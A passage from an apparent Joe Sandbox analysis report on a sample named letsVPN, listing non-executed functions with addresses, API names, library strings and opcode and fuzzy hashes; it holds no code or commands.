                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                    • Opcode ID: f9e1fab9efc598d66fbb79237c1423fa25954eb310448d5e60bbd672ac8ab111
                                                                                                                                                                                                    • Instruction ID: 2214d58ec07041e1d9f2035fec5d9a05c868a091659b50a81ce1d858af0d3717
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e1fab9efc598d66fbb79237c1423fa25954eb310448d5e60bbd672ac8ab111
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5090023050470852E65E9B20549975812246709755F00481D550340454CD2985184200

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 0000000180009BBC Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 343timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsstr$File$Time$ByteCharLocalMultiPointerWidewcscpy
                                                                                                                                                                                                    • String ID: /../$/..\$\../$\..\
                                                                                                                                                                                                    • API String ID: 2997815599-3885502717
                                                                                                                                                                                                    • Opcode ID: 73e90b5781355c026e4f44748d29e5f9f8853ab8c3945732c1ff4fdd186b9a52
                                                                                                                                                                                                    • Instruction ID: 0b4cf74cff9bb6ad9da9143f84b15d340c06d9b2b76d1b36e80c1d71b783d103
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73e90b5781355c026e4f44748d29e5f9f8853ab8c3945732c1ff4fdd186b9a52
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87E1D23260568886EBA6CF65E4807DEB7E0F7897C4F54C026EE8A47785DF38D609CB00
                                                                                                                                                                                                    Function 000000018001BBCD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _invoke_watson$wcscspn
                                                                                                                                                                                                    • String ID: .$_.,
                                                                                                                                                                                                    • API String ID: 1707156713-3384562259
                                                                                                                                                                                                    • Opcode ID: 330da3cf74221dcfec55f0d7c27dc5aa7eba75c17d4802ee0e85fab0e1c6c3c9
                                                                                                                                                                                                    • Instruction ID: b0fc5f76ffcb9960392ef42f77fbae1970b7befc858140f1ab578103345b96ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330da3cf74221dcfec55f0d7c27dc5aa7eba75c17d4802ee0e85fab0e1c6c3c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0412331704B4C41FBFAAA26B4117EA6299A74C7C4F90C926BF4983A86EF74C749C340
                                                                                                                                                                                                    Function 00000001800278D5 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess_errno_lseeki64_nolock_setmode_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 225511624-0
                                                                                                                                                                                                    • Opcode ID: 62fd43c9a7a1900edd905e455bd74925793bd9a4038350885f1d5a85c33384c3
                                                                                                                                                                                                    • Instruction ID: e170ef0dd857d4d1927c2d7ad55283b08b578037938fe0c670b5775163442cfa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62fd43c9a7a1900edd905e455bd74925793bd9a4038350885f1d5a85c33384c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2301C431304A5882EAE75B2868093ED53526B4DBF0F188312FE39077D7DE38C64A8701
                                                                                                                                                                                                    Function 000000014006BC9C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2227589648.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2227538138.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2227693863.00000001400B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2227715494.00000001400B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2227715494.0000000140AB4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2229116730.0000000140E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2229334963.00000001410C1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2229334963.0000000141AC1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231362311.0000000141F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231385330.0000000141F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_140000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: 892a3ebab87a0513f23e75662c33cb5c65145fa5cc2fdb9ecd944fbbdd7018f7
                                                                                                                                                                                                    • Instruction ID: eb0e9a72c1070ba67a247c4e2d22537436e33b9092eccdb49ccfd359c4d295c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892a3ebab87a0513f23e75662c33cb5c65145fa5cc2fdb9ecd944fbbdd7018f7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A012D32225F4486E7928F22E8543D56364FB4DBD0F586521FF9E47BB4DB38CA958700
                                                                                                                                                                                                    Function 000000018000DDF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000DE73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                    • Opcode ID: 0729cf235f289e4ed8bbd33f0e26635c52233a112e2d8750ea279f1aac1ac0a9
                                                                                                                                                                                                    • Instruction ID: 2b860f793b5af0edec94a73f4ee2df70cd83d2f14e2db46e587fa401933e544a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0729cf235f289e4ed8bbd33f0e26635c52233a112e2d8750ea279f1aac1ac0a9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38117032210B48A7FB86DB26E6443E933B4FB1C395F548125E70982A61EF79D27CC710
                                                                                                                                                                                                    Function 000000018000B35C Relevance: 5.6, Strings: 4, Instructions: 567COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid block type$invalid stored block lengths$too many length or distance symbols
                                                                                                                                                                                                    • API String ID: 0-26694007
                                                                                                                                                                                                    • Opcode ID: 256f91a70c9afeee36dbb25d12fbb447125e18a01c1cf04cb194e42f51fe4d09
                                                                                                                                                                                                    • Instruction ID: b769c965244b2721c296923db2336362b01c4c05965258fb1307178c8f15bbbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 256f91a70c9afeee36dbb25d12fbb447125e18a01c1cf04cb194e42f51fe4d09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED32AF72214A888BE7B5CF15E4547AE77A5F388784F108119EB8B87B94DF78DA48CF01
                                                                                                                                                                                                    Function 000000018001650C Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                    • Opcode ID: 4efd85538ee5ccf830b5393b3d7e8f79fe04d4581bf56c2a2b08e2d8d0e36e47
                                                                                                                                                                                                    • Instruction ID: 831c55dee90e53978df5b1189dc5e0f709427b15748c518f55f0954f494d9295
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4efd85538ee5ccf830b5393b3d7e8f79fe04d4581bf56c2a2b08e2d8d0e36e47
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E0E235E04E0CC6F7D39B42FCDA7A12762B36C349F909105D80C06A7ADEAC83AD8700
                                                                                                                                                                                                    Function 000000018002A038 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ed645578d0c4e36627093d7a0e2c143c4f52d220a03c9b3845c9b881ff5d5334
                                                                                                                                                                                                    • Instruction ID: 6093f9aaf8053b0040caf8c58e220a4bc3a97d3d26a7318618f91423f0edfd9d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed645578d0c4e36627093d7a0e2c143c4f52d220a03c9b3845c9b881ff5d5334
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDD0C99AD0DA9396F793005A45903551B401B163E4F8981769EA8063D18E0E6E46A244
                                                                                                                                                                                                    Function 0000000180017175 Relevance: 47.7, APIs: 25, Strings: 2, Instructions: 483fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ConsoleFileWrite_errno$ByteCharModeMultiWide_getptd_getptd_noexit_invalid_parameter_noinfo_isatty_lseeki64_nolockisleadbyte
                                                                                                                                                                                                    • String ID: U$p^f
                                                                                                                                                                                                    • API String ID: 3520455412-3998816472
                                                                                                                                                                                                    • Opcode ID: a1d51b49281c44d7484275276e233aa3cb53cada12c7ba4be642932869736177
                                                                                                                                                                                                    • Instruction ID: b46e96f5a14dbaed61057a6421e814b0e27d8fd4eeb1fb219b01a6310670cfc6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d51b49281c44d7484275276e233aa3cb53cada12c7ba4be642932869736177
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53229232304E4986E7A28F69E4843EEA7B1F7897D4F548115FA4E837A6DF78C649C700
                                                                                                                                                                                                    Function 0000000180010B4C Relevance: 18.1, APIs: 12, Instructions: 73COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                    • Opcode ID: ee1d19fea0bae8f54c4ecce85b8f7f5e9882ddbb557b93a21096a6cdb9f4d0ec
                                                                                                                                                                                                    • Instruction ID: 540f112b3376753d76ebebbc2b080d9ee08ccc9e8b3e512eb475de5d71797ad2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee1d19fea0bae8f54c4ecce85b8f7f5e9882ddbb557b93a21096a6cdb9f4d0ec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24313035601E8C85FFD7DB51E8993E42362BB5D7D4F18C216E969066A2CFE8878C8740
                                                                                                                                                                                                    Function 00000001800247C7 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 183fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$Handle_lseeki64_nolock$CloseErrorLast_close_nolock_dosmaperr_errno_free_osfhnd$File__create_set_osfhnd_write
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 1668876506-727254517
                                                                                                                                                                                                    • Opcode ID: e3146d647d6935da85357ae33a8d5690b59f691699a25a2c77bb634041758d8b
                                                                                                                                                                                                    • Instruction ID: 0fe23ee3c5093393091e27a1d6bc270ec4a231297c21357290c6c28af45ec14f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3146d647d6935da85357ae33a8d5690b59f691699a25a2c77bb634041758d8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D871F633B24A4C85FBA7CB68C4943EC2760A749BE8F14D215EE6A5B7E5CE78C509C701
                                                                                                                                                                                                    Function 00000001800069AC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionThrow$std::system_error::system_error
                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                    • API String ID: 1466986864-1866435925
                                                                                                                                                                                                    • Opcode ID: f218849abe9b38e94ac4d2c630ac8f88cbc5ff5d085dbd21e556318f958075ca
                                                                                                                                                                                                    • Instruction ID: 19bd8bc911f40175b97b9093b97bc396dab6228c1c64309ee3559f4edbb63a7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f218849abe9b38e94ac4d2c630ac8f88cbc5ff5d085dbd21e556318f958075ca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8417A72B04B58C9FB92DB64E9413EC33A5F789788F94C025EA4917A69EF34C64AC340
                                                                                                                                                                                                    Function 000000018001A20B Relevance: 16.6, APIs: 11, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast__freetlocinfo_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2902648625-0
                                                                                                                                                                                                    • Opcode ID: 4f86707f042f0f70e309f282cd80fb6350a7b1e5d563aaadb29fb266c30f3f84
                                                                                                                                                                                                    • Instruction ID: d4fd448629bea0944a9ce6419166f042996569ef96d57f7d0e9fc5dd1e168700
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f86707f042f0f70e309f282cd80fb6350a7b1e5d563aaadb29fb266c30f3f84
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4312931706D8C45FFDBABA580513FC1252AB8EBC0F488026F91A076C6CE668B4C8711
                                                                                                                                                                                                    Function 00000001800189A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle_set_osfhnd_unlock_fhandle$_errno_invoke_watson
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 455515276-727254517
                                                                                                                                                                                                    • Opcode ID: fc89ad88c8ebd5d190681edaa4108cb78eab84b12ccd4b9125013d2badd4f79d
                                                                                                                                                                                                    • Instruction ID: ee76e099d312f5228527cdb841e2a866b73033335cbf8fc842a488cc13d2f90e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc89ad88c8ebd5d190681edaa4108cb78eab84b12ccd4b9125013d2badd4f79d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C951E073228AC882EB92CB15E4853DE7B61F789BD0F548117EE89077A5CF78C659C701
                                                                                                                                                                                                    Function 0000000180001CF8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 1501107325-3145022300
                                                                                                                                                                                                    • Opcode ID: 8b29f3d75597b23acd27b8da13887c9b4e7b9201f86d751601d085f138d50bc9
                                                                                                                                                                                                    • Instruction ID: 8ca33a061464bba5c45e6683e1bf953228fea4ddb1bd0cbe83332f27337d7377
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b29f3d75597b23acd27b8da13887c9b4e7b9201f86d751601d085f138d50bc9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031A036204A49C5EBE3DB25E8403E97361F78CBE1F548222FA69076E9DF74C64AC700
                                                                                                                                                                                                    Function 0000000180001E28 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowctypestd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 4140347317-3145022300
                                                                                                                                                                                                    • Opcode ID: 4a6e3db9f86bfa185145943c2ba9ce5d8d32fd3de24b8126471decbf8e0ce72a
                                                                                                                                                                                                    • Instruction ID: bba0dda19b7f5636e58bd831b7008e13427c54b61a4d0a3d5926d346d7e8960c
